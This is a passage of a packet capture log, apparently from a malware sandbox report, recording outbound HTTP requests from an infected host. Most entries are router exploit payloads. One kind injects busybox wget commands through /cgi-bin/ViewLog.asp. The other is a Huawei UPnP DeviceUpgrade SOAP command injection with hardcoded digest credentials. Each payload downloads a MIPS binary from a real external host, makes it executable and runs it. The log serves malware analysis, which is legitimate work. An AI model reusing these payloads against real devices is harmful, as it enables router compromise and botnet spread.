                                              Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 39 2e 31 34 39 2e 31 38 2e 36 30 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 33 2d 31 31 2d 32 33 20 31 32 3a 31 37 3a 34 38 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                              Data Ascii: Unauthorized ...IP Address: 89.149.18.60MAC Address: Server Time: 2023-11-23 12:17:48Auth Result: .


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              608192.168.2.134270294.123.184.1018080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:54.635818958 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              609192.168.2.1349184156.253.33.2837215
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:54.701437950 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:17:58.822201014 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:18:04.966255903 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:18:16.998150110 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              610192.168.2.135318485.69.34.1038080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:54.903497934 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:55.494235039 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:56.646219969 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:59.078227997 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:03.686188936 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:12.902173996 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              611192.168.2.135503062.29.46.858080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:54.937448025 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              612192.168.2.133620294.122.200.1748080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:55.090841055 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              613192.168.2.134761061.139.119.21923
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:55.221024036 CET233INHTTP/1.0 200 OK
                                              Server: Proxy
                                              Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 39 2e 31 34 39 2e 31 38 2e 36 30 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 33 2d 31 31 2d 32 33 20 31 32 3a 31 37 3a 34 38 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                              Data Ascii: Unauthorized ...IP Address: 89.149.18.60MAC Address: Server Time: 2023-11-23 12:17:48Auth Result: .


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              614192.168.2.135315695.85.24.128080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:55.548007011 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:55.731780052 CET550INHTTP/1.1 400 Bad Request
                                              Date: Thu, 23 Nov 2023 02:57:38 GMT
                                              Server: Apache/2.4.7 (Ubuntu)
                                              Content-Length: 303
                                              Connection: close
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 39 32 2e 31 36 38 2e 30 2e 31 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.7 (Ubuntu) Server at 192.168.0.14 Port 80</address></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              615192.168.2.133781231.136.179.2258080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:55.551723957 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:58.566221952 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
